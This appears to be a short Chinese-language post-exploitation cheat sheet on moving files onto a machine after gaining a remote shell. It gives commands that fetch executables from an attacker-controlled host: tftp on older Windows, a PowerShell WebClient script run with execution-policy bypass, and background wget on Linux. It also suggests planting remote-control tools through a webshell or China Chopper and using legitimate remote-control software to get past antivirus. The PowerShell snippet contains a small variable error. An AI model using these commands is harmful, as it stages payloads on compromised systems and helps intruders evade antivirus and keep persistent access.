**拿到远程shell上传文件(cmd)** * * * * * ***windows：*** **xp、03等系统用tftp传:** tftp 192.168.1.2(开启tftp的主机) get 文件名 tftp会被防火墙拦截 * * * * * **win7、08以上用powershell** 首先：echo get.ps1内容 > get.ps1 //创建这个文件 get.ps1(文件内容): ~~~ $wc=New-Object System.Net.WebClient $url="http://下载地址" $file="newname.exe" $wc.DownloadFile($url,file) ~~~ 执行下边命令： `powershell.exe -ExecutionPolicy Bypass -NonInteractive -NoProfile -File get.ps1` **Linux：** `wget 下载地址 //-b参数：进行后台的方式运行wget` * * * * * **有webshell或者菜刀就直接传 ——`远控`** 最大的挑战，反病毒软件 使用合法的远控软件